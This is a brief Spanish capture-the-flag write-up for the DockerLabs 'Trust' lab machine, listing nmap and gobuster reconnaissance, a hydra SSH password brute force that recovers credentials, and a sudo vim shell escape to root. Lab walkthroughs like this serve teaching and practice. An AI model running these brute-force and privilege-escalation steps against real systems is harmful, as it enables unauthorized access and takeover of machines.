~/home
Volver a Writeups
dockerlabs facil Linux

Trust

05 Apr 2026
#ssh #brute-force #sudo #privesc

Reconocimiento

nmap -sV -sC -p- --min-rate 5000 172.17.0.2

Puertos abiertos: 22 (SSH), 80 (HTTP).

Enumeración Web

gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirb/common.txt

Encontramos /secret.php con un nombre de usuario: mario.

Fuerza Bruta SSH

hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2

Credenciales válidas: mario:chocolate.

Acceso y Escalada

ssh mario@172.17.0.2
sudo -l

El usuario puede ejecutar /usr/bin/vim como root:

sudo vim -c ':!/bin/bash'

root@trust:/# cat /root/root.txt